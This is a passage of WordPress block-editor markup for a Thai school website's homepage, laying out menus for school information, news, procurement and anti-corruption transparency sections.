thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder\\u0026p=328\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}]} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"author\":[],\"offset\":\"0\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#2d27a1\",\"headingHoverBgColor\":\"#abb8c3\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#0693e3\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#8ed1fc\",\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=334\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" 